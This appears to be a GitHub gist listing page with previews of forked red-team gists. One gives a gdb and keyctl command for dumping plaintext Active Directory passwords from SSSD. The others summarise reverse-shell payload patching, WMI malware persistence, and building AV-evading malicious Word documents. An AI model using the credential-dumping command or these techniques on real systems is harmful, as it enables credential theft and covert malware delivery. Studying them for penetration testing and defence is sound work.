Skip to content

Instantly share code, notes, and snippets.

View shelld0n's full-sized avatar

Amine shelld0n

6 followers · 6 following
View GitHub Profile
@shelld0n
shelld0n / gist:bdeff6194ec729d7d1c3ee81c317da8f
Created May 27, 2021 19:47 — forked from jeffmcjunkin/gist:d5fb8dbf15cbd5d37a77fafccda4d969
Retrieving SSSD plain text passwords (krb5_store_password_if_offline)
for who ever this interest, if you enable krb5_store_password_if_offline in the SSSD configuration, the AD password for accounts is stored in plaintext in the kernel keyring
to dump the clear text password you can do :
```
gdb -p <PID_OF_SSSD>
call system("keyctl show > /tmp/output")
```
From the /tmp/output locate the key_id for the user you want
Example of an output is :
@shelld0n
shelld0n / msfvenom-reverse-tcp-WaitForSingleObject.md
Created January 14, 2019 21:25 — forked from mgeeky/msfvenom-reverse-tcp-WaitForSingleObject.md
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for WaitForSingleObject call within modern msfvenom generated payload.

Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.

Contents:

@shelld0n
shelld0n / WMIPersistence.vbs
Created January 14, 2019 15:27 — forked from mgeeky/WMIPersistence.vbs
Visual Basic Script implementing WMI Persistence method (as implemented in SEADADDY malware and further documented by Matt Graeber) to make the Macro code schedule malware startup after roughly 3 minutes since system gets up.
'
' SYNOPSIS:
' WMI Persistence method as originally presented by SEADADDY malware
' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887)
' and further documented by Matt Graeber.
'
' The scheduled command will be launched after roughly 3 minutes since system
' gets up. Also, even if the command shall spawn a window - it will not be visible,
' since the command will get invoked by WmiPrvSE.exe that's running in Session 0.
'
@shelld0n
shelld0n / muti-stage-1.md
Created January 14, 2019 15:27 — forked from mgeeky/muti-stage-1.md
Multi-Stage Malicious Document creation process (ala APT)

Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process

The below paper documents the process of creating a multi-stage IPS/AV transparent malicious document for purposes of Red Teaming / Penetration-Testing assignments.

The resulted document will be:

  • using OLE event autorun method
  • removing it's pretext shapes
  • Obtaining commands to be executed from document's Author property and passing them to StdIn of Powershell.exe process
  • Leveraging certutil technique to receive Base64 encoded malicious HTA document
  • Having Base64 encoded Powershell command in that Author property